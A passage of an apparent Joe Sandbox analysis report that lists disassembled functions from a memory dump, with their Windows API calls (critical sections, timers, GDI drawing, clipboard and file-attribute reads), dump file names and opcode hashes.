                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1404962471-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                                                                                                                                                                                          Function 005293B0 Relevance: 7.6, APIs: 5, Instructions: 77sleepCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1430435781-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                                                                                                                                                                                          Function 004F5CB0 Relevance: 7.6, APIs: 6, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                                                                                                                                                                                          Function 004D8010 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                                                                                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3777265051-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                                          • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                                                                                                                                                                                          Function 004E4660 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3104255891-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                                          • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                                                                                                                                                                                          Function 004D9C20 Relevance: 7.5, APIs: 5, Instructions: 30clipboardCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 464010812-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                                                                                                                                                                                          Function 004CFD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(?,00000000,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?), ref: 004CFE0F
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852), ref: 004CFDAF
                                                                                                                                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(00000000,00000000,?,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?,00000000), ref: 004CFDED
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile$Version
                                                                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                                                                          • API String ID: 3849939888-4282027825
                                                                                                                                                                                                                                                                                                                          • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                                          • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                                                                                                                                                                                          Function 004FA670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,00153804), ref: 004F9B35
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                          • String ID: FriendlyName
                                                                                                                                                                                                                                                                                                                          • API String ID: 904232820-3623505368
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                                                                                                                                                                                          Function 004CAB90 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
                                                                                                                                                                                                                                                                                                                          • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3137390749-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
